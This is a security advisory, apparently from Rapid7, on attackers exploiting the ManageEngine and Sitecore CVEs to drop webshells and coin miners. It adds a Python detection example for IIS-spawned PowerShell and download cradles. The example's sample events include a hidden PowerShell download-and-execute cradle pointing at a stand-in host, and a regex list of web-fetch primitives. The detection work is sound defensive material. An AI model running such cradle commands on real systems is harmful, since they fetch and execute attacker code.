Over the weekend of November 6, 2021, Rapid7’s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:
- CVE-2021-40539, a REST API authentication bypass in Zoho’s ManageEngine ADSelfService Plus product that Rapid7 has previously analyzed. CISA warned of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. As of November 8, 2021, Microsoft is also warning that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.
- CVE-2021-42237, a deserialization vulnerability in the Sitecore Experience Platform that allows for unauthenticated remote code execution in earlier versions. The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. With that said, based on the rate of compromise Rapid7 teams have observed, there seems to be a higher number of organizations with vulnerable installations than expected.
Attackers appear to be targeting these vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7’s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.
The following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and PowerShell activity related to this attack:
- Webshell - IIS Spawns CMD to Spawn PowerShell
- Attacker Technique - PowerShell Download Cradle
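To make concrete what these two behavior detections look for, the following is an added example written for this page; it is not InsightIDR's rule logic or any Rapid7 code. It assumes Sysmon-style process-creation events with `pid`, `ppid`, `image` and `cmdline` fields (the field names and all sample events are constructed), walks each event's parent chain to find an IIS worker process (`w3wp.exe`) that spawned `cmd.exe` which in turn spawned PowerShell, and separately flags PowerShell command lines that fetch content from a URL with the usual download-cradle primitives.

```python
import re

# Constructed sample events in a Sysmon-like shape (assumed field names).
# pid 300 is the interesting one: w3wp.exe -> cmd.exe -> powershell.exe
# with a download cradle; pid 500 is ordinary interactive PowerShell.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "w3wp.exe -ap DefaultAppPool"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage.ps1')"},
    {"pid": 400, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\temp"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
IIS_CHAIN = ("w3wp.exe", "cmd.exe")  # expected parent, grandparent of PowerShell

# Well-known PowerShell web-fetch primitives; a cradle also needs a URL.
FETCH_RE = re.compile(
    r"(net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|start-bitstransfer)", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(event, by_pid, max_depth=32):
    """Image basenames from the event itself up through its parents."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["pid"] not in seen and len(chain) < max_depth:
        seen.add(cur["pid"])
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def detect_iis_cmd_powershell(events):
    """PIDs of PowerShell processes whose parent is cmd.exe under w3wp.exe."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(e, by_pid)
        if chain and chain[0] in POWERSHELL and chain[1:3] == ["cmd.exe", "w3wp.exe"]:
            hits.append(e["pid"])
    return sorted(hits)


def detect_download_cradle(events):
    """PIDs of PowerShell processes whose command line fetches from a URL."""
    return sorted(e["pid"] for e in events
                  if basename(e["image"]) in POWERSHELL
                  and FETCH_RE.search(e["cmdline"]) and URL_RE.search(e["cmdline"]))


def run_detections(events):
    """Map each detection name from the post to the PIDs it would alert on."""
    return {
        "Webshell - IIS Spawns CMD to Spawn PowerShell": detect_iis_cmd_powershell(events),
        "Attacker Technique - PowerShell Download Cradle": detect_download_cradle(events),
    }


if __name__ == "__main__":
    for name, pids in run_detections(EVENTS).items():
        print(f"{name}: {pids}")
```

The parent-chain check is what separates the webshell signal from benign PowerShell: pid 500 runs the same binary but descends from `explorer.exe`, so only pid 300 fires, and it fires on both rules because the cradle is the second stage of the same intrusion.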
InsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a remote vulnerability check. Rapid7 vulnerability researchers have a full technical analysis of this vulnerability available here. Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. A technical analysis of this vulnerability is available here.